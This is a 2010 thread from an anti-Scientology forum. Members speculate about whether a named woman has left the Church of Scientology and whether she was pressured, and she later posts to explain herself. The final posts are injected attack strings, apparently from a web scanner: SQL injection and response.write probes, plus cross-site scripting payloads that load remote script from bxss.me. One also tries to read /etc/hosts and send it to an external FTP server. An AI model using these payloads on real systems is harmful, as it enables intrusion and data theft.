Customize

Louise Cronin is out of the Church of Scientology

Discussion in 'Independent Scientology' started by Kha Khan, Jun 8, 2010.

1. Kha Khan Member

Louise Cronin is out of the Church of Scientology

There is a comment on Marty's blog that Louise Cronin is out of the Church of Scientology:
    "I'm with you awesome fellas [on Marty's blog]" = I am an Independent Scientologist = I am no longer a member of the official Church of Scientology.

Mike Rinder later provided some family information:
    Finally, it appears Louise's sister, Rachel Donohue may still be in the PAC RPF:
    I'll try to keep an eye out for Louise's "five page story" if she ever posts it.

ESMB Thread: Louise Cronin is out of the Church of Scientology

/
  2. Anonymous Member

Re: Louise Cronin is out of the Church of Scientology

That-Is-Great_Horray.jpg
  3. JohnnyRUClear Member

So who's this one?
  4. Kha Khan Member

This is very strange. As far as I can tell, Louise Cronin's "coming out" coment:
    HAS BEEN DELETED. I see replies to the comment, but not the original comment.

I'm concerned she may have been placed under some pressure to go back to the COS or to be quiet.

/
  5. Ogsonofgroo Member

It would not be any sort of surprise Kha, not the first or I think, the last time. Thanks for new infos *bows*
  6. Kha Khan Member

It is very weird and, quite frankly, disconcerting.

Right now, the discussion thread on Marty's blog is like one of those old Soviet Politibureau photographs where they "erase" a disfavored figure, but mistakenly leave a shadow, part of a leg, etc. Louise's comment has been erased, but the replies congratulating her on coming out have not.

And just to be clear, I am not accusing Marty of doing anything nefarious. If, as it appears, Louise's comment was deleted, I believe it was at her request. Unfortunately, I also believe she made the request to delete her comment after being put under pressure by the COS.

I don't know Louise, but it still pisses me off.

/
  7. JohnnyRUClear Member

The stories of those kinds of experiences are important. Obviously, she's not a happy camper in there, and that genie does not go back in the bottle, even if her tongue does. That ESK founder, Amy IIRC, also shut up again after starting to blow the whistle.

Such an evil cult. So good to see it listing and sinking.
  8. TinyDancer Member

Amy was not a founder of ESK. Perhaps you're thinking of Kendra.
  9. Scatman Member

Considering the length of time that Louise adhered to the dogma of the cult, she will behave like a yoyo for a while (floating) until she comes to terms with her identification to the scientology criminal enterprise.
    Clearly, organized scientology still influences her thought processes. While she may consider herself "out", mentally she still complies with the orders and dogma from the cult.
    I think that this provides an example of the strength of scientology brainwashing.
    No need to upset yourself because of it, just accept the facts.
  10. Kha Khan Member

Thanks.

An interesting thing is that -- while it is not exactly the Streisand effect -- this thread is getting more attention after Louise Cronin's "coming out" comment was deleted than it was before. Before, it was like, "Um, who is this Louise Cronin?"

/
  11. JohnnyRUClear Member

Hmmm... I dunno. I just remember one of the 3 came down with a bad case of clam(p)-jaw and stopped speaking out, allegedly to get the cult to not disconnect her from her family.

Sick cult is sick.

So who is this Louise Cronin?
  12. Kha Khan Member

She is someone who left the Church of Scientology and apparently was then shuddered into silence, at the very least. She may have been coerced into returning.

Isn't that enough?

/
  13. Anonymous Member

This is why I love screen shots so much.
  14. Scatman Member

I think that Louise's sudden silence indicates also that "independent scientology" does nothing to undo the brainwashing effects of organized scientology.
  15. JohnnyRUClear Member

I'll take "silly questions" for $1000, Alex.

The mere fact that they (seemingly, at least) care enough to bother shutting her up means we need to know moar about her. What are her crimes??

The neat thing about silence is that it says nothing, leaving it to everyone and anyone to read into it whatever they like.
  16. AnotherSock Member

I'm guessing there was a faked-up gagging order from a tame Scion-lawyer... or just some pressure applied via Rachel Donohue.

Is this an escapee who is experiencing fair-gaming, or a 'bungee-jumping clam' who returned to the fold? Or even an escapee who posted as an 'independent Scientologit' and then decided that Rinder and Rugburn were too moonbattish, and moved on out into the free world.

My question is... does a short-lived entry on Marty's site constitute 'speaking out' against Scientology? ITT: Probably not worthy of an entry on the 'Big List of Exes' just yet, but I'm pleased to see the number of Scientologists dwindling further.
  17. OTBT Member

This Firefox add-on beats the hell out of the default "print screen" screen shot function:

https://addons.mozilla.org/en-US/firefox/addon/5648/
  18. lousqueezius Member

In response to these posts...

Im not a Scientologist, my parents were and it was their choice not mine to get involved. nor am I an Independent though I have a huge amount of respect or Marty and Mike for their gutsy work in exposing the injustices that are being perpetrated in the name of religion.

I wasn’t pressured to retract my blog. I asked Marty to remove it and he did.

Most of us have a story, tragedy and triumphs and each of us are shaped by these experiences; good and bad. These are what makes us strong and wise.
    • Like Like x 2
  19. xenubarb Member

Why'd you ask Marty to remove your post?
  20. Smurf Member

http://www.forum.exscn.net/attachment.php?attachmentid=1614&d=1253405354
  21. Anonymous Member

After reviewing the OP, it does appear that she does not actually admit to anything personally, whether she is/was a scilon/indie. And the above quoted post is just as cagey, imo. A lot of denials, and no clarifications except for the source of her comment to be removed was herself. She'd make a talented politician.

My guess is she's working on keeping connections with family member(s).

So I say WELCOME LOUISE! I hope to hear more from you!
    • Like Like x 2
  22. subrosa Member

If it appears on Marty's blog, it is automatically suspect.
  23. anonanchovie Member

Well done Louise, you ARE strong and wise. Your story is a moving one, you had some tough knocks, you have my respect. (and it is great to talk to you again!!!)
  24. anonanchovie Member

Come on lads, easy on the tin foil, people come out of the cult, often very scared, disorientated and full of Hubbard's and OSA's tales about the real world. It is a huge step to take, and this silly suspicion on newly out people just serves to keep them silent, keep them scared or even worse drive them back in to the arms of the operation they just left. Have some curtesy, no, humanity, please.
    • Like Like x 1
  25. Anonymous Member

AHEM, Smurf

She clearly says

Which is purely in the present tense. She does not say that she was never a scientologist, just that she is not now nor that she is an independant! Cut her some slack instead of jumping on her as have many jumped on you about your past in which you've had to retort!
    • Like Like x 1
  26. anonanchovie Member

I know this lady well, she was a sea org kid, I would say that she had no choice but to tow the line, she had no family outside of the Sea Org, she actually knew nothing of life outside of the Sea Org. She states, quite accurately, that she is not a scientologogist, nor an independent, that joining scientology was he parents choice, not hers. I have know Louise for over twenty years, she means what she says. Why should she repost, considering the reaction to her post, weird suspicion, hinted accusations, she would almost have thought that she had entered a cult board.

She knows a lot of stuff, but has kids to protect.

She is good people.
    • Like Like x 3
  27. Smurf Member

Thanks, anonanchovie. I've received emails from other exes that knew Louise & her family back in Sussex. Given that info, I've edited previous posts. I wish Louise well wherever she is at.
    • Like Like x 2
  28. hushpuppy Member

It is impressive to me how WWP self corrects, both when it is getting too tinfoily - and when it is getting too naive.
    • Like Like x 2
  29. Anonymous Member

There is wisdom in crowds.
    • Like Like x 1
  30. hushpuppy Member

Agreed.
    WWP has a more colorful makeup than that of a random crowd sample though IMO =)
  31. JohnnyRUClear Member

32. Anonymous Member

• Like Like x 3
  33. response.write(9004595*9931651)
  34. '+response.write(9004595*9931651)+'
  35. </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-42627&h=3-6708f-2&/).slice(2),document.documentElement.appendChild(s))//'>
  36. -1 OR 2+891-891-1=0+0+0+1 --
  37. "+response.write(9004595*9931651)+"
  38. -1 OR 2+642-642-1=0+0+0+1
  39. response.write(9869534*9298565)
  40. -1' OR 2+240-240-1=0+0+0+1 --
  41. '>"><script src=http://bxss.me/s?u=013541&r=3-42628&h=3-6708f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013541,3-42628,3,6708f,%22%5D"/>
  42. '+response.write(9869534*9298565)+'
  43. -1' OR 2+711-711-1=0+0+0+1 or 'cMAxvNRi'='
  44. "+response.write(9869534*9298565)+"
  45. -1" OR 2+755-755-1=0+0+0+1 --
  46. response.write(9399690*9852517)
  47. </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-42629&h=3-6708f-2&/).slice(2),document.documentElement.appendChild(s))//'>